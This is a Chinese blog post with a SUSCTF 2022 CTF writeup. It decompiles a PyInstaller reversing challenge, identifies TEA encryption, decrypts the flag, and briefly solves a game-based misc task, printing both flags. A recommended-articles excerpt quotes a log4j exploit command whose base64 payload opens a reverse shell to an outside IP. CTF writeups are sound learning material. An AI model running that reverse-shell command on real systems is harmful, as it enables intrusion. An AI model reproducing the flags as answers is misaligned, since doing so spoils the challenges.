SUSCTF2022WP

最新推荐文章于 2022-07-09 00:01:44 发布
最新推荐文章于 2022-07-09 00:01:44 发布
阅读量827 收藏 1
点赞数 1
分类专栏: WP 文章标签: Re
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51911432/article/details/123189009
版权

SUSCTF2022WP

出了一道Re,另一道是dart和flutter,干不动就这样了,又玩了会红警,整挺好
比赛结束发现还有团队赛。。。
等官方wp出了再复盘吧

Re

DigitalCircuits

python pyinstxtractor.py DigitalCircuits.exe

将文件夹里的DigitalCircuits提出,复制struct里的magic number

利用网站反编译

得到

def f1(a, b):# &
    if a == '1' and b == '1':
        return '1'
    return '0'


def f2(a, b):# |
    if a == '0' and b == '0':
        return '0'
    return '1'


def f3(a): # ~
    if a == '1':
        return '0'
    if a == '0':
        return '1'


def f4(a, b):
    return f2(f1(a, f3(b)), f1(f3(a), b))


def f51(x, y, z):
    s = f4(f4(x, y), z)
    return s
def f52(x, y, z):
    c = f2(f1(x, y), f1(z, f2(x, y)))
    return c

def f6(a, b):
    ans = ''
    z = '0'
    a = a[::-1]
    b = b[::-1]
    for i in range(32):
        ans += f51(a[i], b[i], z)
        z = f52(a[i], b[i], z)
    
    return ans[::-1]


def f7(a, n): # 左移
    return a[n:] + '0' * n


def f8(a, n):# 右移
    return n * '0' + a[:-n]


def f9(a, b):
    ans = ''
    for i in range(32):
        ans += f4(a[i], b[i])
    
    return ans


def f10(v0, v1, k0, k1, k2, k3):
    s = '00000000000000000000000000000000' # sum
    d = '10011110001101110111100110111001'# 9E 37 79 B9
    for i in range(32):
        s = f6(s, d)
        v0 = f6(v0, f9(f9(f6(f7(v1, 4), k0), f6(v1, s)), f6(f8(v1, 5), k1)))# v1<<4
        v1 = f6(v1, f9(f9(f6(f7(v0, 4), k2), f6(v0, s)), f6(f8(v0, 5), k3)))
    
    return v0 + v1

k0 = '0100010001000101'.zfill(32) # key=DEADBEEF
k1 = '0100000101000100'.zfill(32)
k2 = '0100001001000101'.zfill(32)
k3 = '0100010101000110'.zfill(32)
flag = input('please input flag:')
if flag[0:7] != 'SUSCTF{' or flag[-1] != '}':
    print('Error!!!The formate of flag is SUSCTF{XXX}')
    exit(0)
flagstr = flag[7:-1]
if len(flagstr) != 24:
    print(len(flag))
    print('Error!!!The length of flag 24')
    exit(0)
res = ''
for i in range(0, len(flagstr), 8): # 0-7,8-16,16-24
    v0 = bin(ord(flagstr[i]))[2:].zfill(8) + bin(ord(flagstr[i + 1]))[2:].zfill(8) + bin(ord(flagstr[i + 2]))[2:].zfill(8) + bin(ord(flagstr[i + 3]))[2:].zfill(8)
    v1 = bin(ord(flagstr[i + 4]))[2:].zfill(8) + bin(ord(flagstr[i + 5]))[2:].zfill(8) + bin(ord(flagstr[i + 6]))[2:].zfill(8) + bin(ord(flagstr[i + 7]))[2:].zfill(8)
    res += f10(v0, v1, k0, k1, k2, k3)
print(res)
if res == '001111101000100101000111110010111100110010010100010001100011100100110001001101011000001110001000001110110000101101101000100100111101101001100010011100110110000100111011001011100110010000100111':
    print('True')
else:
    print('False')
# SUSCTF{XBvfaEdQvbcrxPBh8AOcJ6gA}

通过特征值0x9e3779b9和左移4位右移5位,猜测是TEA加密,使用脚本

#include <stdio.h>
#include <stdint.h>
//加密函数
void encrypt(uint32_t *v, uint32_t *k)
{
    uint32_t v0 = v[0], v1 = v[1], sum = 0, i;           /* set up */
    uint32_t delta = 0x9e3779b9;                         /* a key schedule constant */
    uint32_t k0 = k[0], k1 = k[1], k2 = k[2], k3 = k[3]; /* cache key */
    for (i = 0; i < 32; i++)
    { /* basic cycle start */
        sum += delta;
        v0 += ((v1 << 4) + k0) ^ (v1 + sum) ^ ((v1 >> 5) + k1);
        v1 += ((v0 << 4) + k2) ^ (v0 + sum) ^ ((v0 >> 5) + k3);
    } /* end cycle */
    v[0] = v0;
    v[1] = v1;
}
//解密函数
void decrypt(uint32_t *v, uint32_t *k)
{
    uint32_t v0 = v[0], v1 = v[1], i; /* set up */
    uint32_t delta = 0x9e3779b9;
    uint32_t sum = delta * 32;                           /* a key schedule constant */
    uint32_t k0 = k[0], k1 = k[1], k2 = k[2], k3 = k[3]; /* cache key */
    for (i = 0; i < 32; i++)
    { /* basic cycle start */
        v1 -= ((v0 << 4) + k2) ^ (v0 + sum) ^ ((v0 >> 5) + k3);
        v0 -= ((v1 << 4) + k0) ^ (v1 + sum) ^ ((v1 >> 5) + k1);
        sum -= delta;
    } /* end cycle */
    v[0] = v0;
    v[1] = v1;
}

int main()
{
    uint32_t k[4] = {'DE','AD','BE','EF'};
    uint32_t v[]={0x3E8947CB,0xCC944639};
    uint32_t v1[]={0x31358388,0x3B0B6893};
    uint32_t v2[]={0xDA627361,0x3B2E6427};
    decrypt(v, k);
    decrypt(v1, k);
    decrypt(v2, k);
    // printf("decode: %x %x\n", v[0], v[1]);
    unsigned long len = 8;
     puts((char *)v);
    for (int i = 0; i < len; i++)
    {
        printf("%x ", (*((char *)v + i)));
    }
    for (int i = 0; i < len; i++)
    {
        printf("%x ", (*((char *)v1 + i)));
    }
    for (int i = 0; i < len; i++)
    {
        printf("%x ", (*((char *)v2 + i)));
    }
    return 0;
}

试了一下不对,然后想起来应该是小端序

最后是小端序逆向输出

s="fvBXQdEarcbvhBPxcOA8Ag6J"
for i in range(0,len(s),4):
    a=s[i:i+4]
    print(a[::-1],end="")

SUSCTF{XBvfaEdQvbcrxPBh8AOcJ6gA}

MISC

ra2

战役地图围墙把基地保护好,造了条狗探路,最后在地图下面有个牌子,牌子上有flag
在这里插入图片描述

SUSCTF{RED_ALERT_WINNER}

Pvr1sC
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
SUSCTF逆向部分WP
WocW的博客
04-13 476
RE1 签到题 直接拖入IDA查看主函数。 RE2 拖入IDA查看主函数,只有一个输入和简单的比较。 根据比较算法写出python脚本 a=[0x53,0x54 ,0x51,0x40,0x50 ,0x43 ,0x7D ,0x26 ,0x29 ,0x28 ,0x46 ,0x5A ,0x58 ,0x6A ,0x60 ,0x66,0x69,0x74,0x6b,0x6E] for i in range...
SUSCTF202-Misc部分wp
haiyang19的博客
03-01 368
SUSCTF2022 Misc checkin 不得不吐槽给机器人发了个信息就被ban了的迷惑情况… 有变化截个图就行了 ra2 完成任务即可发现flag,由于难度有些大,所以可修改mods/rv/rules文件里的参数,把月球基地血量进行更改,士兵攻击以及血量等参数更改,急速通关即可 也可以利用围墙将月球基地保护,这样小怪无法攻击月球基地,造兵正常打就行。 在地图上找到 AUDIO 通过题目描述可以知道朋友发来的文件里面藏有一些秘密,并且题目附件给了源音频。先听朋友的音频发现背景里好像有嘀嘀嘀得摩斯电
KnightCTF2022-WP
qq_45989120的博客
01-24 548
Feistel 密码结构 Challenge: m, n = 21, 22 def f(word, key): out = "" for i in range(len(word)): out += chr(ord(word[i]) ^ key) return out flag = open("flag.txt", "r").read() L, R = flag[0:len(flag)//2], flag[len(flag)//2:] x = "".join(chr
“红明谷“ 初赛 web 部分WP
feng的博客
04-03 1387
前言 参加了第一届红明谷的比赛,4道web当时只做出2道,第三道苦于那个数据库的密码不知道,赛后才问了别的师傅才知道是123456这个弱密码。。。草了。 因为实在太懒了。。。本来不想专门写这篇WP的,因为当时做题的时候只潦草的记下了当时的wp,用的姿势可能还不是最简便的方式。但是想想,不写的话总感觉缺了点什么,所以就把我当时潦草的wp记录给复制粘贴过来了(笑),见谅见谅。 happysql ban了单引号,但是查询的语句中用的是双引号,拿双引号闭合,如果登录成功的会302跳转到home.php,因此可以布尔
南京邮电大学网络攻防训练平台writeup
weixin_34406086的博客
01-06 3734
本文带目录版本:https://findneo.github.io/170924NuptCTFWP/ 南邮CTF平台网址: http://ctf.nuptsast.com/challenges http://ctf.nuptzj.cn/challenges WEB 签到题 nctf{flag_admiaanaaaaaaaaaaa} ctrl+u或右键查看源代码即可。在CTF比赛中,代码...
ISCC2022题目附件
06-06
2022ISCC所有题目附件,包含ISCC2022-练武题附件和ISCC2022-擂台题附件 信息安全已涉及到国家政治、经济、文化、社会和生态文明的建设,信息系统越发展到它的高级阶段,人们对其依赖性就越强,从某种程度上讲其越...
封面应用WP7
04-02
这是封面应用WP7源码,也是Windows Phone 7封面应的一个实例,可以实现项目演示影片效果,和一些书籍等封面效果,该界面不但可以实现左右滚动,而且效果很不错,喜欢wp开发的朋友可以下载学习一下。
Wp.rar_wp
09-14
简单实用的butterworth滤波器设计,很好用
WP7连连看游戏
04-02
该源码实现一款现在很流行的一种游戏,WP7连连看游戏,游戏玩法很简单,只要我们需要找到相同的两张牌用三根以内的直线连在一起就可以消除,非常好玩,并且游戏的源码比较齐全,喜欢wp游戏开发的朋友可以下载学习看...
wp实现一键锁屏功能
04-04
在WP8的时候,关于如何关闭屏幕,国内外都有不少文章了,大家有兴趣地可以搜搜,很多,我就不给链接了,因为稍后我的例子中会有。 其实,关闭屏幕是调用了未开放的API,正因为这个API未开放的,不敢保证所有机型都能...
[susctf2022-pwn] 02-happytree
weixin_52640415的博客
02-28 416
早晨才看到比赛,9点就结束。结束后作了一道题。 堆有漏洞大概有3个:UAF,写溢出,未初始化指针。其中未初始化指针是最难找了,一般想不到。不过也有个办法如果找不着前边两个就找后边这个。 题目有add,show,free三个函数。其中add有两个未初始化指针: __int64 __fastcall m1add(__int64 a1, __int64 a2, unsigned int a3) { __int64 v5; // [rsp+10h] [rbp-10h] v5 = a2; if
2022MRCTF-wp
qq_45603443的博客
04-27 651
2022MRCTF-wpWebJust HackingGod_of_GPAWebCheckInJava_mem_shell_BasicJava_mem_shell_FilterMiscpddConnecting...Tip Web Just Hacking 爆出密码foobared redis getshell 在root目录docker config发现账号密码。 登录发现私有镜像 本地运行getflag God_of_GPA 笔记页面有dom xss 认证的地方存在xss 可把token发到其他地
2022RWCTF体验赛web的wp
qq_48511129的博客
01-24 1413
1.Digital Souvenir 兑换码 RealworldIsAwesome 2.log4flag 参考 https://le1a.gitee.io/posts/3e4e56bc/ 启动jndi服务 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuMzQuNDYuOTQvMTIzNDUgMD4mMQ==}|{base64,-d}|{bash,-
CTF wp 2018“骇极杯”全国大学生网络安全邀请赛暨第四届上海市大学生网络安全大赛线上赛 writeup
Thea_1207的博客
11-05 3766
为0x00 签到题操作内容: | 登陆比赛界面上去看到签到题,一般情况下签到题是没有难度的题目给定一串字符MZWGCZ33GM2TEMRSMQZTALJUGM4WKLJUMFTGELJZGFTDILLBMJSWEYZXGNTGKMBVMN6Q Base32 一闪而过,比的就是手速,解码拿到flag。 FLAG 值: 标志{35222d30-439e-4afb-91F4-abebc73fe0...
BUUCTF reverse1-10 WP
mumuzi的博客
03-28 4296
笔记是按照当时的题目排序写的,顺序可能有出入 做题是从0开始做起,所以前面部分也会尽可能写的详细一点 只要能记录并且了解到怎么做即可,所以就没有去在意排版 遇到不会的函数尽可能去百度了解 因为前面的题难度不大,所以前面的每道题都没有去查壳,除非有特殊:) 题目:easyre、reverse1、reverse2、内涵的软件、新年快乐、helloword、xor、reverse3、不一样的flag、SimpleRev 1.easyre 非常简单的逆向 拖入winhex,搜索flag即可 flag{this_I
Buuoj刷题记录
meteox的博客
08-09 4065
--- title: Buuoj刷题记录 date: 2020-07-20 11:07:42 tags: 题解 categories: ctf img: https://img.buuoj.cn/buugirl/img/1.png 记录buuoj写过的题 web [HCTF 2018]WarmUp F12看到存在source.php,跳转后看到代码 <?php highlight_file(__FILE__); class emmm { publ
BUU_RE方向的题目WP
Fvduan的博客
07-09 219
CTF,BUU_OJ,逆向,re
✿2021NEWCTF6.1萌新赛✿MISC-all-WP
Tokeii想躺平
06-02 2743
2021萌新赛MISCWP,加一道CryptoMISC-sign inMISC-very-ez-dumpMISC-!了反都,了反MISC-happy六一MISC-PeltateMISC-base64 ... or base56?MISC-????????????MISC-包 MISC-sign in 下载解压发现pdf需要密码打开 直接爆破,得到密码:661123 打开文件获得flag: flag{welec0me_to_news_ctf} MISC-very-ez-dump 下载文件,直接用foremo
2022 2.26
m0_57754423的博客
02-26 184
昨天:卷王杯写了两题 然后卡住睡觉了 今天:继续写了卷王杯的题目,有了很大进展,但最终还是卡住了,最终只能放弃,然后susctf pwn持续爆零 没学过misc 但却出了一道misc题目 emm今天几乎是吗都没干,一直在坐牢。 明天:汇编基础有点差,这周打算把汇编和wiki上所有的pwn基础知识全部过一遍。 下周开始:努力刷题,打比赛提高自己。 ...
强网杯 2022 谍影重重wp
最新发布
12-18
强网杯2022谍影重重WP是我国一项网络安全竞赛中的一个题目解答。这道题目主要涉及隐写和密码学方面的知识,要求选手解析一段加密信息,并还原出明文信息。 解题过程如下: 首先,选手会得到一段看似普通的文本,但其中隐藏着隐藏着几个不同类型的隐藏信息。选手需要借助隐写分析工具,例如StegSolve,来分析图像中是否含有LSB隐写、色彩分量隐写等信息。此外,选手还要注意文字中是否有使用不常见的Unicode字符来隐藏信息。 在找到隐写信息后,接下来是解密密码学部分。选手需要根据提示,使用正确的解密方法对隐藏信息进行还原。可能涉及到的密码学算法有:凯撒密码、栅栏密码、维吉尼亚密码等。需要选手根据密钥或者加密规则,反推出正确的解密方法,并对隐藏信息进行解码。 通过以上步骤,选手最终可以得到明文信息,也就是这道题目的答案。 这道题目整体难度较高,需要选手具备扎实的密码学和隐写学知识,并具有分析和解决问题的能力。参赛选手需要细心观察、耐心分析,才能顺利解答出这个谜题。同时,这道题目也展示了网络安全竞赛中的一种常见挑战方式,旨在培养选手的思维敏捷性和解决复杂问题的能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值